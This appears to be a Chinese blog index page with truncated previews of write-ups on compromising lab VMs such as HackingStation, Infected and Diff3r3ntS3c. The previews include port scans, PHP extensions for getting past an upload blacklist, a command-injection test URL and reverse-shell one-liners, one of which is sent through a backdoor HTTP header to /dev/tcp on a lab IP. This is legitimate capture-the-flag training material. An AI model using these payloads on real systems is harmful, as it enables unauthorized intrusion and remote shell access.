2.2k 2 分钟

# 靶场搭建 下载:Deploy Nat,IP: 192.168.1.137 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
1.3k 1 分钟

# 靶场搭建 靶场下载:Diff3r3ntS3c 导入调成 NAT 模式,直接打开 IP: 192.168.1.130 # 渗透构成 # 信息初收集 端口只开了 80 应该是个文件上传 php 格式直接上传会被判定恶意,后端黑名单,所以需要其他后缀名的马。 PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module 在 PHPv8 中: .php, .php4,...
731 1 分钟

# 靶场练习 下载:Doctor Nat,IP: 192.168.1.141 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: | 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)|_ 256...
2.9k 3 分钟

# 靶场搭建 下载:https://mega.nz/file/EfJhXZJI#fcUtdUtiyDnwXc56qio8N3R2c-XHOAK4ZeypKm94oeI 导入 VM,NAT 模式打开 IP: 192.168.1.128 # 渗透过程 # 信息初收集 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)| ssh-hostkey: | 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)|_ 256...
1.1k 1 分钟

# 靶场搭建 下载:Fing Nat,IP: 192.168.1.140 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
466 1 分钟

# 靶场搭建 下载地址:HackingStation 直接导入,点击重试,NAT 模式打开就 OK 了 IP: 192.168.1.131 # 渗透过程 # 信息初收集 只开了 80 端口 打开网页抽了一眼有一个搜索,尝试下注入,无果。 仔细看了一下,发现是 searchsploit,怀疑后台是执行的命令,测试一下: http://192.168.1.131/exploitQuery.php?product=blog.gddfeng.com;pwd 返回了路径,OK 了家人,反弹直接拿 shell 1;bash -c 'bash -i >&...
405 1 分钟

# 靶场搭建 下载地址:Infected 导入,Nat 模式,直接开干 IP: 192.168.1.133 # 渗透过程 # 信息初收集 80 端口和 22 发现有 info.php info.php 中发现加载了 mod_backdoor 模块,那就存在后门了,直接干 # 后门利用 网上搜这个模块,找到利用方式 反弹拿到 shell ┌──(root㉿kali)-[~]└─# curl -H 'Backdoor: bash -c "bash -i >& /dev/tcp/192.168.1.129/4444...
1.7k 2 分钟

# 靶场搭建 下载:Look Nat 模式,IP: 192.168.1.134 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
631 1 分钟

# 靶场搭建 下载:Mux 下载,导入,NAT,开干 IP: 192.168.1.134 # 渗透过程 # 信息初收集 80/tcp open http Apache httpd 2.4.56 ((Debian))|_http-title: Monna Lisa|_http-server-header: Apache/2.4.56 (Debian)512/tcp open exec netkit-rsh rexecd513/tcp open login514/tcp open tcpwrapped80 端口进去一张图片,下载下来瞅一眼字符串:...
1.5k 1 分钟

# 靶场搭建 下载:Node Nat,IP: 192.168.1.136 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...